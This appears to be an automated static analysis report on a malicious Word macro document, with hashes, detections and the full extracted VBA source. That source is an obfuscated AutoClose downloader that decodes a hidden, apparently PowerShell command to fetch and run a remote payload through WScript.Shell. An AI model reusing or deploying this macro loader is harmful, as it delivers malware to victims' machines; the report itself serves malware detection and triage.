Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f584ec598c2926ec…

MALICIOUS

Office (OOXML)

40.1 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-01-20
MD5: ec8bae15417dcc2ba4b92a03904ef297 SHA-1: f1879f675834d2ac2db61ca72033b5e7ef892881 SHA-256: f584ec598c2926ecd0ee48c84a0a4e6d780de993281f390f6f93f014649fd2f2
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The AutoClose macro is triggered upon document closure, which then calls the Labrador_Retriever function. This function utilizes WScript.Shell to execute a command constructed from obfuscated strings, likely downloading and executing a second-stage payload. The ClamAV detection 'Doc.Malware.Emooodldr-6711604-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
  Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
  Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoClose()
  Dim Crested_Penguin As String
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2482 bytes
SHA-256: b12fbbd024e65ccc5526748728086524ffc5b1dbc37aea07ab70b3b5c1f36c27
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
  Dim Crested_Penguin As String
  Crested_Penguin = "qpyhuukgmn0g{e /nor 0G{ec!Cyrcuv -Doombqg *Ohy.Qbkhdw!Syuuhp0Pgt.ZfcElihpv).GowqmpcfFlne*'huwq:/2nqon{yf|{fcue.eon2qnbt/gdogia0gcw). $hqv:DPQFCVB!,!*_YSKJ/f{g*+> Vuarw.Prpdhut 'env:AQRFDUC(\XPKJ/e{g';!(Ogx.Qelhdw Szstfm0Ngt0YfbEojhpt,0FqxnlrbgTtrloj**juvq:/0nnmp}{c|xedvd/dqp2u.rjpAjf=gaogga),"
  Application.Run "Labrador_Retriever", Crested_Penguin
End Sub

Public Function Labrador_Retriever(Humpback_Whale As String)
  Dim Scorpion As String
  Scorpion = RTrim("11233232122230020020323001102223001020133021321201313100213322200311200322003003112203202001310031320113233221020132311033132023232200330030122211113323211132323031003100113210300000122312101021103200101211232313001001020202210231320322210031310031323212100110023302023301123320220212030130023")
  Call CreateObject("WScript.Shell").Run(Module1.Bearded_Dragon(Humpback_Whale, LTrim(Scorpion), "", "Bonobo Liger"), 0)
End Function

Attribute VB_Name = "Module1"
Option Explicit

Public Function Emperor_Tamarin(Grasshopper As String) As Integer
  Emperor_Tamarin = (AscB(Grasshopper) - (Asc("Newfoundland Squid Pygmy_Marmoset Moth Woodpecker") - Asc("Newfoundland Squid Pygmy_Marmoset Moth Woodpecker")))
End Function


Public Function Dunker(Golden_Oriole, Fox_Terrier) As Integer
  Dim Lemming As Integer
  Lemming = Int(Mid(Golden_Oriole, Fox_Terrier, 1))
  Dunker = Lemming
End Function

Public Function Bearded_Dragon(Dodo As String, Newfoundland As String, Persian As String, Malayan_Civet As String)
  Dim Fly As Integer
  For Fly = 1 To Len(Dodo)
     Dim Dolphin As Integer
     Dolphin = Dunker(Newfoundland, Fly)

     Dim Bull_Mastiff As String
     Dim Asian_Elephant As Integer

      Bull_Mastiff = Mid(Dodo, Fly, 1)
      Asian_Elephant = Emperor_Tamarin(Bull_Mastiff)
      Asian_Elephant = Asian_Elephant - Dolphin - 0

    Persian = Persian & Poodle(Asian_Elephant)
  Next
  
  Bearded_Dragon = Persian
End Function


Public Function Poodle(White_Rhinoceros As Integer)
  Poodle = ChrW(White_Rhinoceros - (Asc("Bonobo Liger") - Asc("Bonobo Liger")))
End Function

Attribute VB_Name = "Module2"
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15360 bytes
SHA-256: cb0790439b480c37db8f4d749d38fabb3cd293b1d4fc2897f67404ae0933e23a
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.